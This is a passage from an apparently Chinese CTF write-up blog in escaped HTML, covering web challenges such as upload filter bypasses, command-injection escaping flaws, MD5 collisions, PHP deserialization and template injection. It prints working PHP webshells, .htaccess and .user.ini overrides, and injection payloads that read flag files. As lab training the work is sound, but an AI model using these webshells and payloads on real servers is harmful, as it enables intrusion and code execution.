\u6743\uff09\u7684\u65b9\u6cd5\u4e86\uff09\u3002<\/p>\n\n\n\n
\u6240\u4ee5\u5bf9\u4e8e\u4f20\u9a6c\u9898\uff0c\u6211\u4eec\u7684\u601d\u8def\u5c31\u662f\u60f3\u529e\u6cd5\u7ed5\u8fc7\u53ef\u80fd\u5b58\u5728\u7684\u8fc7\u6ee4<\/strong>\u6765\u4f20\u5165\u5e26\u6709\u53ef\u63a7\u53d8\u91cf\u7684\u6728\u9a6c\u6587\u4ef6\u5e76\u8ba9\u5b83\u80fd\u591f\u88ab\u89e3\u6790\u3001\u6267\u884c\u3002<\/p>\n\n\n\n
\u6700\u57fa\u7840\u7684php\u4e00\u53e5\u8bdd\u6728\u9a6c\uff1a<\/p>\n\n\n\n
<?php\n@eval($_POST[\"shell\"]);\/\/POST\u4e5f\u53ef\u4ee5\u4e3aGET\n?><\/code><\/pre>\n\n\n\n
\u4fdd\u5b58\u4e3a.php\u540e\u7f00\u6587\u4ef6\u540e\uff0c\u5373\u662f\u4e00\u4e2a\u6700\u57fa\u7840\u7684php\u6728\u9a6c\u4e86\u3002\u63a5\u4e0b\u6765\u5f00\u59cb\u770b\u9898\u76ee\u3002<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u76f4\u63a5\u5c1d\u8bd5\u4e0a\u4f20\u6728\u9a6c\u6587\u4ef6attack.php\u53d1\u73b0\u6709\u63d0\u793a\u53ea\u80fd\u4e0a\u4f20\u540e\u7f00\u4e3ajpg\u3001png\u3001gif\u7684\u6587\u4ef6\uff0c\u8bf4\u660e\u8fd9\u4e2a\u4e0a\u4f20\u7cfb\u7edf\u6709\u5bf9\u4e0a\u4f20\u7684\u6587\u4ef6\u7684\u540e\u7f00\u8fdb\u884c\u68c0\u6d4b\u5e76\u53ea\u5141\u8bb8\u5904\u4e8e\u767d\u540d\u5355\u4e2d\u7684\u6587\u4ef6\u901a\u8fc7\uff08jpg\u3001png\u3001gif\uff09\u3002\u4f46\u8981\u6ce8\u610f\uff0c\u8fd9\u4e2a\u63d0\u793a\u662f\u4ee5\u5f39\u7a97\u51fa\u73b0\u7684\uff0c\u5f88\u53ef\u80fd\u610f\u5473\u7740\u8fd9\u53ea\u662f\u4e2a\u524d\u7aef\u7684\u68c0\u6d4b\u3001\u8fc7\u6ee4\uff0c\u6240\u4ee5\u901a\u8fc7\u628a\u6587\u4ef6\u540e\u7f00\u6539\u4e3a.jpg\u5373\u53ef\u901a\u8fc7\u68c0\u6d4b\u3002\u4f46\u662f.jpg\u3001.png\u7b49\u540e\u7f00\u6587\u4ef6\u65e0\u6cd5\u88ab\u4f5c\u4e3aphp\u6587\u4ef6\u6267\u884c\uff08\u610f\u5473\u7740\u6211\u4eec\u5199\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c\u8d77\u4e0d\u4e86\u4f5c\u7528\uff09\u3002<\/p>\n\n\n\n
\u6211\u4eec\u53ef\u4ee5\u628a\u6728\u9a6c\u6587\u4ef6\u540e\u7f00\u6539\u4e3a.jpg<\/strong>\uff0c\u7136\u540e\u5728\u786e\u8ba4\u4e0a\u4f20\u65f6\u901a\u8fc7brupsuit\u6765\u6293\u5305\uff08\u5728\u6293\u5230\u5305\u4e4b\u524d\uff0c\u6d4f\u89c8\u5668\u524d\u7aef<\/strong>\u5df2\u7ecf\u5bf9\u6587\u4ef6\u540e\u7f00\u505a\u4e86\u68c0\u6d4b\uff0c\u540e\u7f00\u4e3a.jpg\uff0c\u5141\u8bb8\u4e0a\u4f20\uff09\uff0c\u5e76\u5c06\u5305\u4e2d\u7684attack.jpg\u6539\u4e3aattack.php\u6216attack.phtml(.phtml\u3001.php3\u3001.php5\u7b49\u540e\u7f00\u6587\u4ef6\u4e5f\u53ef\u901a\u8fc7\u8681\u5251\u8fde\u63a5\uff09\uff0c\u5373\u53ef\u8ba9attack.php\u88ab\u6210\u529f\u4e0a\u4f20\u8fdb\u670d\u52a1\u5668\u3002<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u770b\u5230\u63d0\u793aUpload Success!\u5e76\u4e14\u663e\u793a\u51fa\u4e86\u6587\u4ef6\u4e0a\u4f20\u5230\u7684\u5730\u5740\uff0c\u63a5\u4e0b\u6765\u4fbf\u7528\u8681\u5251\u6765\u8fde\u63a5\u8be5\u6587\u4ef6\u5373\u53ef\u3002\uff08url\u5730\u5740\u586b\u6728\u9a6c\u6240\u5728\u5730\u5740\uff0c\u8fde\u63a5\u5bc6\u7801\u5373\u4e3a\u6587\u4ef6\u91cc\u5199\u597d\u7684\u53ef\u63a7\u53d8\u91cf\uff09 <\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
[MRCTF 2020] \u4f60\u4f20\u4f60?\u5462<\/h3>\n\n\n\n
\u9047\u5230\u4e0a\u4f20\uff0c\u76f4\u63a5\u5c1d\u8bd5\u4f20\u9a6c<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u6709\u68c0\u6d4b\uff0c\u800c\u4e14\u5f88\u53ef\u80fd\u662f\u540e\u7aef\u7684\uff0c\u610f\u5473\u7740\u4e0d\u80fd\u50cf\u4e0a\u4e00\u9053\u9898\u90a3\u6837\u901a\u8fc7brupsuit\u6539\u5305\u6765\u7ed5\u8fc7\u3002<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
 \u5c1d\u8bd5\u4e0a\u4f20.jpg\u6587\u4ef6\uff0c\u5141\u8bb8\u4e0a\u4f20\u3002<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u968f\u4fbf\u8bbf\u95ee\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684url\uff0c\u5f97\u5230\u56de\u663e\uff0c\u5f97\u77e5\u670d\u52a1\u5668\u7528\u7684\u662fApache\/2.4.10\u3002\u5728\u4f4e\u4e8e2.3.8\u7248\u672c\u7684Apache\u914d\u7f6e\u6587\u4ef6\u4e2d\u6709\u4e2aAllowOverride<\/strong>\u6307\u4ee4\u9ed8\u8ba4\u4e3aAll\uff0c\u5373\u5141\u8bb8.htaccess\u6587\u4ef6\u4e2d\u7684\u4e00\u4e9b\u6307\u4ee4\u53ef\u4ee5\u8986\u76d6\u4e3b\u914d\u7f6e\u6587\u4ef6\u4e2d\u7684\u4e00\u4e9b\u8bbe\u7f6e<\/strong>\u3002\uff08.htaccess\u6587\u4ef6\u662fApache\u5206\u5e03\u5f0f\u914d\u7f6e\u6587\u4ef6\u7684\u9ed8\u8ba4\u540d\u79f0\uff09\u4f46\u5728\u66f4\u9ad8\u7684\u7248\u672c\u91cc\uff0cAllowOverride\u9ed8\u8ba4\u4e3aNone\uff0c.htaccess\u6587\u4ef6\u4f1a\u5931\u6548\u3002\u8fd9\u9053\u9898\u7684\u9776\u673a\u914d\u7f6e\u91cc\uff0cAllowOverride\u4e3aAll\u3002<\/p>\n\n\n\n
\u7ecf\u8fc7\u5c1d\u8bd5\u53ef\u77e5.htaccess\u6587\u4ef6\u53ef\u4ee5\u88ab\u6210\u529f\u4e0a\u4f20<\/strong>\uff08\u8fd9\u9053\u9898\u662f\u4ee5\u9ed1\u540d\u5355\u6765\u8fc7\u6ee4\uff0c\u5373php\u3001php3\u3001php5\u3001phtml\u7b49\u540e\u7f00\u4e0d\u88ab\u5141\u8bb8\uff0c\u800c\u5176\u5b83\u7684\u540e\u7f00\u4e0d\u53d7\u5f71\u54cd\uff09\u6240\u4ee5\u6211\u4eec\u7684\u601d\u8def\u662f\uff1a\u901a\u8fc7\u4e0a\u4f20.htaccess\u6587\u4ef6\uff0c\u6765\u8ba9\u5176\u5b83\u540e\u7f00\u6587\u4ef6\u4e5f\u53ef\u4ee5\u88ab\u4f5c\u4e3aphp\u6587\u4ef6\u89e3\u6790\u3001\u6267\u884c\u3002\u4e0b\u9762\u662f\u4e00\u4e2a.htaccess\u6587\u4ef6\u7684\u5b9e\u4f8b\uff1a<\/p>\n\n\n\n
<FilesMatch \"jpg\"> \/\/\u5339\u914d\u5230jpg\u540e\u7f00\u65f6\uff08jpg\u4e5f\u53ef\u4ee5\u6362\u6210\u5176\u5b83\u540e\u7f00\uff1a.png\/.gif\nSetHandler application\/x-httpd-php \/\/\u8c03\u7528x-httpd-php\u6765\u89e3\u6790\u8be5\u6587\u4ef6\n<\/FilesMatch><\/code><\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u4e0a\u4f20\u65f6\u6ce8\u610f\u670d\u52a1\u5668\u4f1a\u5bf9\u8bf7\u6c42\u5305\u4e2d\u7684Content-Type\uff08\u6587\u4ef6\u7c7b\u578b\uff09<\/strong>\u505a\u68c0\u6d4b\u8fc7\u6ee4\uff0c.htaccess\u9ed8\u8ba4\u7684Content-Type\u7c7b\u578b\u4e3aapplication\/octet-stream<\/strong>\uff0c\u4e0d\u88ab\u5141\u8bb8\uff0c\u6240\u4ee5\u8981\u6539\u4e3aimage\/jpeg<\/strong>\uff08jpg\u7684\u6587\u4ef6\u7c7b\u578b\uff09\u3002<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u53ef\u89c1.htaccess\u5df2\u88ab\u6210\u529f\u4e0a\u4f20\uff0c\u63a5\u4e0b\u6765\u4e0a\u4f20\u4e00\u4e2a.jpg\u540e\u7f00\u7684\u6728\u9a6c\u6587\u4ef6<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u6b64\u65f6\u7531\u4e8e.htaccess\u7684\u914d\u7f6e\u8986\u76d6<\/strong>\uff0c\u4e0d\u7ba1\u662f\u76f4\u63a5\u8bbf\u95ee\u8be5\u6587\u4ef6\u8fd8\u662f\u901a\u8fc7\u8681\u5251\u8fde\u63a5\u8be5\u6587\u4ef6\uff0c\u5b83\u90fd\u4f1a\u88ab\u4f5c\u4e3aphp\u6587\u4ef6\u89e3\u6790<\/strong>\u3002\u6240\u4ee5\u8681\u5251\u8fde\u63a5\u7684url\u5730\u5740\u5373\u4e3a[\u57df\u540d]\/upload\/020…d99\/attack.jpg\uff0c\u8fde\u4e0a\u540e\u5373\u53ef\u5728\u670d\u52a1\u5668\u627e\u5230flag<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
[SUCTF 2019] Check In<\/h3>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u591a\u6b21\u5c1d\u8bd5\u53ef\u4ee5\u77e5\u9053\u670d\u52a1\u5668\u4f1a\u5bf9\u6587\u4ef6\u540d\u3001\u6587\u4ef6\u5185\u5bb9<\/strong>\u90fd\u505a\u68c0\u6d4b\u3002\u5176\u4e2d\uff0c\u6587\u4ef6\u5185\u5bb9\u88ab\u5339\u914d\u53d1\u73b0\u4e3a\u811a\u672c\u6587\u4ef6\u65f6\u5c31\u4e0d\u88ab\u5141\u8bb8\u4e0a\u4f20\u3002\u8fd9\u91cc\u53ef\u4ee5\u5728\u6587\u4ef6\u524d\u52a0\u4e0aGIF89a\u6587\u4ef6\u5934\u6765\u8ba9\u670d\u52a1\u5668\u8ba4\u4e3a\u8fd9\u662f\u4e2agif\u6587\u4ef6\u3002\u540c\u65f6\u7531\u4e8e<?php<\/strong>\u4f1a\u88ab\u68c0\u6d4b\uff0c\u6240\u4ee5\u666e\u901a\u7684\u4e00\u53e5\u8bddphp\u6728\u9a6c\u4e0d\u80fd\u4e0a\u4f20\uff0c\u4e8e\u662f\u6362\u7528javascript\u7684\u5199\u6cd5<\/p>\n\n\n\n
GIF89a\n<script language='php'>@eval($_POST['shell']);<\/script><\/code><\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u6587\u4ef6\u4e0a\u4f20\u6210\u529f\uff0c\u63a5\u4e0b\u6765\u5c31\u662f\u60f3\u529e\u6cd5\u8ba9\u5b83\u88ab\u4f5c\u4e3a\u811a\u672c\u6587\u4ef6\u89e3\u6790<\/p>\n\n\n\n
\u6b64\u65f6\u7528\u5230\u7684\u77e5\u8bc6\u70b9\u662f.user.ini\u6587\u4ef6<\/strong>\u3002\u521b\u5efa\u4e00\u4e2a\u540d\u4e3a.user.ini\u7684\u6587\u4ef6\u5e76\u6dfb\u52a0\u4e00\u4e2aauto_prepend_file\u914d\u7f6e<\/strong>\uff08\u4f5c\u7528\u4e3a\u6307\u5b9a\u4e00\u4e2a\u6587\u4ef6\u5728\u4e3b\u6587\u4ef6\u88ab\u89e3\u6790\u524d\u5148\u88ab\u89e3\u6790\uff09\u6216\u8005auto_append_file\u914d\u7f6e<\/strong>\uff08\u4f5c\u7528\u4e3a\u6307\u5b9a\u4e00\u4e2a\u6587\u4ef6\u5728\u4e3b\u6587\u4ef6\u88ab\u89e3\u6790\u540e\u88ab\u89e3\u6790\uff09\u3002\u901a\u8fc7\u8fd9\u4e2a\u914d\u7f6e\uff0c\u53ef\u4ee5\u4f7f\u7528\u6237\u8bbf\u95eeindex.php\uff08\u7f51\u7ad9\u9ed8\u8ba4\u4e3b\u9875\uff09\u540e\u628a\u6307\u5b9a\u6587\u4ef6\u4e00\u8d77\u4f5c\u4e3a\u811a\u672c\u6587\u4ef6\u8fdb\u884c\u89e3\u6790\u3002\u6240\u4ee5\u6784\u9020\u4e00\u4e2a.user.ini\u6587\u4ef6\uff1a<\/p>\n\n\n\n
GIF89a\nauto_prepend_file=shell.jpg<\/code><\/pre>\n\n\n\n
\u4e0a\u4f20\u540e\uff0c\u7528\u8681\u5251\u76f4\u63a5\u8fdeindex.php\u5373\u53ef\u8fde\u4e0a\u670d\u52a1\u5668<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
[BUUCTF 2018]Online Tool<\/h2>\n\n\n\n
<?php\n\nif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {\n    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];\n}\n\nif(!isset($_GET['host'])) {\n    highlight_file(__FILE__);\n} else {\n    $host = $_GET['host'];\n    $host = escapeshellarg($host);\n    $host = escapeshellcmd($host);\n    $sandbox = md5(\"glzjin\". $_SERVER['REMOTE_ADDR']);\n    echo 'you are in sandbox '.$sandbox;\n    @mkdir($sandbox);\n    chdir($sandbox);\n    echo system(\"nmap -T5 -sT -Pn --host-timeout 2 -F \".$host);<\/code><\/pre>\n\n\n\n
\u8fd9\u6bb5\u4ee3\u7801\u5b9e\u73b0\u7528\u6237\u8f93\u5165ip\u5730\u5740\uff0c\u6267\u884cnmap\u547d\u4ee4<\/p>\n\n\n\n
escapeshellarg\u7684\u4f5c\u7528\u662f\u628a\u5b57\u7b26\u4e32\u8f6c\u7801\u4e3a\u53ef\u4ee5\u5728 shell \u547d\u4ee4\u91cc\u4f7f\u7528\u7684\u53c2\u6570\uff0c\u5373\u5148\u5bf9\u5355\u5f15\u53f7\u8f6c\u4e49\uff0c\u518d\u7528\u5355\u5f15\u53f7\u5c06\u5de6\u53f3\u4e24\u90e8\u5206\u62ec\u8d77\u6765\u4ece\u800c\u8d77\u5230\u8fde\u63a5\u7684\u4f5c\u7528\u3002<\/p>\n\n\n\n
escapeshellcmd() \u5bf9\u5b57\u7b26\u4e32\u4e2d\u53ef\u80fd\u4f1a\u6b3a\u9a97 shell \u547d\u4ee4\u6267\u884c\u4efb\u610f\u547d\u4ee4\u7684\u5b57\u7b26\u8fdb\u884c\u8f6c\u4e49\u3002 \u6b64\u51fd\u6570\u4fdd\u8bc1\u7528\u6237\u8f93\u5165\u7684\u6570\u636e\u5728\u4f20\u9001\u5230 exec() \u6216 system() \u51fd\u6570\uff0c\u6216\u8005 \u6267\u884c\u64cd\u4f5c\u7b26 \u4e4b\u524d\u8fdb\u884c\u8f6c\u4e49\u3002<\/p>\n\n\n\n
\u53cd\u659c\u7ebf\uff08\\\uff09\u4f1a\u5728\u4ee5\u4e0b\u5b57\u7b26\u4e4b\u524d\u63d2\u5165\uff1a &#;`|*?~<>^()[]{}$, \\x0A \u548c \\xFF\u3002 \u2019 \u548c ” \u4ec5\u5728\u4e0d\u914d\u5bf9\u513f\u7684\u65f6\u5019\u88ab\u8f6c\u4e49\u3002<\/p>\n\n\n\n
\u4e24\u4e2a\u51fd\u6570\u6309arg\u3001cmd\u7684\u987a\u5e8f\u653e\u5728\u4e00\u8d77\u4f1a\u51fa\u73b0\u7ed5\u8fc7\u6f0f\u6d1e\uff0c\u901a\u8fc7\u6dfb\u52a0\u5355\u5f15\u53f7\u5b9e\u73b0\u7ed5\u8fc7<\/p>\n\n\n\n
\/\/payload\uff1a\n?host=' <?php @eval($_POST[\"shell\"]);?>  -oG shell.php '<\/code><\/pre>\n\n\n\n
\u8fde\u63a5\u4e00\u53e5\u8bdd\u6728\u9a6c\u65f6\u6839\u636e\u63d0\u793a\u6dfb\u52a0\u6c99\u7bb1\u8def\u5f84\u5373\u53ef\uff0c\u4f8b\u5982.cn:81\/89dusd78219esa\/shell.php<\/p>\n\n\n\n
[\u5b89\u6d35\u676f 2019] easy_web<\/h2>\n\n\n\n
\"image-20250209212327591\"\/<\/div><\/figure>\n\n\n\n
\u7559\u610f\u5230img\u503c\u4e3aBase64\uff0c\u8f6c\u7801\u51e0\u6b21\u540e\u77e5\u9053\u7f16\u7801\u8fc7\u7a0b\u662f\u4e00\u6b21ASCII Hex\u3001\u4e24\u6b21Base64<\/p>\n\n\n\n
\"image-20250209212420653\"\/<\/div><\/figure>\n\n\n\n
\u5c06index.php\u8fdb\u884c\u7f16\u7801\u5f97\u5230TmprMlpUWTBOalUzT0RKbE56QTJPRGN3<\/strong>\u4f5c\u4e3aimg\u7684\u503c\u4f20\u5165<\/p>\n\n\n\n
\u5f97\u5230Base64\u7f16\u7801\u503c\uff0c\u89e3\u5bc6\u540e\u5f97\u5230index.php\u6e90\u7801\uff1a<\/p>\n\n\n\n
<?php\nerror_reporting(E_ALL || ~ E_NOTICE);\nheader('content-type:text\/html;charset=utf-8');\n$cmd = $_GET['cmd'];\nif (!isset($_GET['img']) || !isset($_GET['cmd'])) \n    header('Refresh:0;url=.\/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');\n$file = hex2bin(base64_decode(base64_decode($_GET['img'])));\n\n$file = preg_replace(\"\/[^a-zA-Z0-9.]+\/\", \"\", $file);\nif (preg_match(\"\/flag\/i\", $file)) {\n    echo '<img src =\".\/ctf3.jpeg\">';\n    die(\"xixi\u00ef\u00bd\u009e no flag\");\n} else {\n    $txt = base64_encode(file_get_contents($file));\n    echo \"<img src='data:image\/gif;base64,\" . $txt . \"'><\/img>\";\n    echo \"<br>\";\n}\necho $cmd;\necho \"<br>\";\nif (preg_match(\"\/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\\'|\\\"|\\`|;|,|\\*|\\?|\\\\|\\\\\\\\|\\n|\\t|\\r|\\xA0|\\{|\\}|\\(|\\)|\\&[^\\d]|@|\\||\\\\$|\\[|\\]|{|}|\\(|\\)|-|<|>\/i\", $cmd)) {\n    echo(\"forbid ~\");\n    echo \"<br>\";\n} else {\n    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {\n        echo `$cmd`;\n    } else {\n        echo (\"md5 is funny ~\");\n    }\n}\n\n?>\n<html>\n<style>\n  body{\n   background:url(.\/bj.png)  no-repeat center center;\n   background-size:cover;\n   background-attachment:fixed;\n   background-color:#CCCCCC;\n}\n<\/style>\n<body>\n<\/body>\n<\/html><\/code><\/pre>\n\n\n\n
\u5ba1\u8ba1\u6e90\u7801\u77e5\u9700\u8981MD5\u78b0\u649e\uff0c\u6b64\u5904\u5229\u7528payload\uff1a<\/p>\n\n\n\n
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2<\/code><\/pre>\n\n\n\n
\u540c\u65f6\u6784\u9020POST\u5305\u548ccmd\u547d\u4ee4\uff1acmd=ca\\t%20\/f\\l\\a\\g<\/p>\n\n\n\n
\u5f97\u5230flag<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
[BJDCTF 2020] Cookie is so stable<\/h2>\n\n\n\n
\u8fdb\u5165flag.php\u6587\u4ef6\u770b\u89c1\u8f93\u5165\u6846\uff0c\u611f\u89c9\u662fSSTI\uff0c\u8f93\u5165{{5*5}}\u5f97\u5230\u56de\u663e\u662f25\uff0c\u8bf4\u660e\u5b58\u5728SSTI\u6a21\u677f\u6ce8\u5165<\/p>\n\n\n\n
\"image-20250216234545493\"\/<\/div><\/figure>\n\n\n\n
\u63a5\u4e0b\u6765\u8981\u5224\u65ad\u662f\u4ec0\u4e48\u6a21\u677f\u5f15\u64ce<\/p>\n\n\n\n
\"image-20250216234631876\"\/<\/div><\/figure>\n\n\n\n
\u7531\u63d2\u4ef6\u5224\u65ad\u662fPHP\u8bed\u8a00\uff0c\u5bf9\u5e94\u7684\u5e38\u89c1\u6a21\u677f\u5f15\u64ce\u662fsmarty\u3001twig\u3001Blade\uff0c\u9010\u4e00\u6d4b\u8bd5<\/p>\n\n\n\n
\u6b64\u5904\u9644\u4e0a\u5404\u8bed\u8a00\u5e38\u89c1\u7684\u6a21\u677f\u5f15\u64ce\uff1a<\/p>\n\n\n\n
    \n
  • Python\uff1ajinja2\u3001mako\u3001tornado\u3001django<\/li>\n\n\n\n
  • PHP\uff1asmarty\u3001twig\u3001Blade<\/li>\n\n\n\n
  • Java\uff1ajade\u3001velocity\u3001jsp<\/li>\n<\/ul>\n\n\n\n
    \u76f4\u63a5\u8f93\u5165\u6ce8\u5165\u8bed\u53e5\u4f1a\u88ab\u8fc7\u6ee4\uff0c\u901a\u8fc7hint\u63d0\u793a\u53ef\u77e5\u6ce8\u5165\u70b9\u662f\u5728cookie\u5904\uff0c\u591a\u6b21\u6d4b\u8bd5\u540e\u53ef\u77e5\u662ftwig\u6a21\u677f\u5f15\u64ce<\/p>\n\n\n\n
    \"\"\/<\/div><\/figure>\n\n\n\n
    [MRCTF 2020] Ezpop<\/h2>\n\n\n\n
    \u9898\u76ee\u6e90\u7801\uff1a<\/p>\n\n\n\n
    <?php\n\/\/flag is in flag.php\n\/\/WTF IS THIS?\n\/\/Learn From https:\/\/ctf.ieki.xyz\/library\/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95\n\/\/And Crack It!\nclass Modifier {\n    protected  $var;\n    public function append($value){\n        include($value);\n    }\n    public function __invoke(){\n        $this->append($this->var);\n    }\n}\n\u200b\nclass Show{\n    public $source;\n    public $str;\n    public function __construct($file='index.php'){\n        $this->source = $file;\n        echo 'Welcome to '.$this->source.\"<br>\";\n    }\n    public function __toString(){\n        return $this->str->source;\n    }\n\u200b\n    public function __wakeup(){\n        if(preg_match(\"\/gopher|http|file|ftp|https|dict|\\.\\.\/i\", $this->source)) {\n            echo \"hacker\";\n            $this->source = \"index.php\";\n        }\n    }\n}\n\u200b\nclass Test{\n    public $p;\n    public function __construct(){\n        $this->p = array();\n    }\n\u200b\n    public function __get($key){\n        $function = $this->p;\n        return $function();\n    }\n}\n\u200b\nif(isset($_GET['pop'])){\n    @unserialize($_GET['pop']);\n}\nelse{\n    $a=new Show;\n    highlight_file(__FILE__);\n}\n?><\/code><\/pre>\n\n\n\n
    pop\u94fe\uff1ainclude->append->invoke->get->toString->construct<\/p>\n\n\n\n
    Payload\uff1a<\/p>\n\n\n\n
    <?php\nclass Modifier {\n    protected  $var='php:\/\/filter\/read=convert.base64-encode\/resource=flag.php';\n}\nclass Show{\n    public $source;\n    public $str;\n    public function __construct($file='index.php'){\n        $this->source = $file;\n        echo 'Welcome to '.$this->source.\"<br>\";\n    }\n    public function __toString(){\n        return $this->str->source;\n    }\n}\nclass Test{\n    public $p;\n    public function __construct(){\n        $this->p = array();\n    }\n\u200b\n    public function __get($key){\n        $function = $this->p;\n        return $function();\n    }\n}\n$a=new Show();\n$file='index.php';\n$a->source=new Show();\n$a->source->str=new Test();\n$a->source->str->p=new Modifier();\necho url(serialize($a));\n?><\/code><\/pre>\n\n\n\n
    \"image-20250222001448320\"\/<\/div><\/figure>\n\n\n\n
    [BJDCTF 2020] The mystery of ip<\/h2>\n\n\n\n
    \"image-20250222210102821\"\/<\/div><\/figure>\n\n\n\n
    \u70b9\u8fdbflag.php\uff0c\u6253\u5370\u4e86\u6211\u7684\u5185\u7f51ip\uff0c\u4e8e\u662f\u5c1d\u8bd5\u6dfb\u52a0X-Forwarded-For: 127.0.0.1<\/p>\n\n\n\n
    \"image-20250222210306442\"\/<\/div><\/figure>\n\n\n\n
    \u56de\u663e\u8bc1\u660e\u53ef\u63a7\uff0c\u5c1d\u8bd5\u6d4b\u8bd5\u6ce8\u5165\uff1b\u5224\u65ad\u65e0sql\u6ce8\u5165\uff0c\u5c1d\u8bd5ssti\u6ce8\u5165\u8bed\u53e5{5*5}\uff0c\u5f97\u5230\u56de\u663e\u4e3a25\uff0c\u8bc1\u660e\u5b58\u5728\u6a21\u677f\uff0c\u800cphp\u6a21\u677f\u5f15\u64ce\u5e38\u89c1\u6709smarty\u3001twig\u3001Blade\uff0c\u8fd9\u91cc\u901a\u8fc7{config}\u5f97\u5230\u6a21\u677f\u7248\u672c\u7c7b\u578b\u4e3asmarty<\/p>\n\n\n\n
    \"image-20250222210752645\"\/<\/div><\/figure>\n\n\n\n
    \u6ca1\u6709\u8fc7\u6ee4\uff0c\u4e8e\u662f\u76f4\u63a5\u6784\u9020payload\uff1a{system(‘cat \/flag.php’)}\u8bfb\u53d6flag<\/p>\n\n\n\n
    \"image-20250222210856786\"\/<\/div><\/figure>\n\n\n\n
    [WesternCTF 2018] shrine<\/h2>\n\n\n\n
    \u8fdb\u5bb9\u5668\u540e\u5f97\u5230\u6e90\u7801\uff0c\u6574\u7406\u5f97\u5230\uff1a<\/p>\n\n\n\n
    import flask\nimport os\napp = flask.Flask(__name__) \napp.config['FLAG'] = os.environ.pop('FLAG') \n\n@app.route('\/') \ndef index(): \n\treturn open(__file__).read() \n\n@app.route('\/shrine\/') \ndef shrine(shrine): \n\tdef safe_jinja(s): \n\t\ts = s.replace('(', '').replace(')', '') \n\t\tblacklist = ['config', 'self'] \n\t\treturn ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s \n\treturn flask.render_template_string(safe_jinja(shrine)) \nif __name__ == '__main__': \n\tapp.run(debug=True)<\/code><\/pre>\n\n\n\n
    \u53ef\u4ee5\u770b\u5230\u6709\u4e00\u4e2a\/shrine\/\u8def\u7531\uff0c\u91cc\u9762\u6709flask\u6a21\u677f\uff0c\u8fc7\u6ee4\u4e86\u62ec\u53f7\u548cconfig\uff0c\u6240\u4ee5\u8981\u901a\u8fc7jinjia2\u6a21\u677f\u6ce8\u5165\u7ed5\u8fc7\u8fc7\u6ee4\uff0c\u8bbf\u95ee\u5176\u4ed6\u5185\u7f6e\u5bf9\u8c61\u6765\u83b7\u53d6config\uff1a\u901a\u8fc7\u8bbf\u95eecurrent_app(\u5e94\u7528\u5b9e\u4f8b\u4ee3\u8868\u5bf9\u8c61)\u76f4\u63a5\u83b7\u53d6config\u4e2d\u7684flag<\/p>\n\n\n\n
    \/\/\u6784\u9020payload\uff1a\n\/shrine\/{{url_for.__globals__.current_app.config.FLAG}}<\/code><\/pre>\n\n\n\n
    \"\u5c4f\u5e55\u622a\u56fe<\/div><\/figure>\n\n\n\n
    [\u5b89\u6d35\u676f 2019] easy_serialize_php<\/h2>\n\n\n\n
    \u8bfb\u6e90\u7801<\/p>\n\n\n\n
    <?php
    \u200b
    $function = @$_GET['f'];
    \u200b
    function filter($img){
        $filter_arr = array('php','flag','php5','php4','fl1g');
        $filter = '\/'.implode('|',$filter_arr).'\/i';
        return preg_replace($filter,'',$img);
    }
    \u200b
    \u200b
    if($_SESSION){
        unset($_SESSION);
    }
    \u200b
    $_SESSION[\"user\"] = 'guest';
    $_SESSION['function'] = $function;
    \u200b
    extract($_POST);
    \u200b
    if(!$function){
        echo '<a href=\"index.php?f=highlight_file\">source_code<\/a>';
    }
    \u200b
    if(!$_GET['img_path']){
        $_SESSION['img'] = base64_encode('guest_img.png');
    }else{
        $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
    }
    \u200b
    $serialize_info = filter(serialize($_SESSION));
    \u200b
    if($function == 'highlight_file'){
        highlight_file('index.php');
    }else if($function == 'phpinfo'){
        eval('phpinfo();'); \/\/maybe you can find something in here!
    }else if($function == 'show_image'){
        $userinfo = unserialize($serialize_info);
        echo file_get_contents(base64_decode($userinfo['img']));<\/code><\/pre>\n\n\n\n
    \u53ef\u77e5\u53ef\u7528\u4e0aextract\u51fd\u6570\u5b9e\u73b0\u952e\u540d\u9003\u9038\uff1b\u9996\u5148\u8bfb\u53d6phpinfo\u627e\u63d0\u793a<\/p>\n\n\n\n
    \"image-20250225145935367\"\/<\/div><\/figure>\n\n\n\n
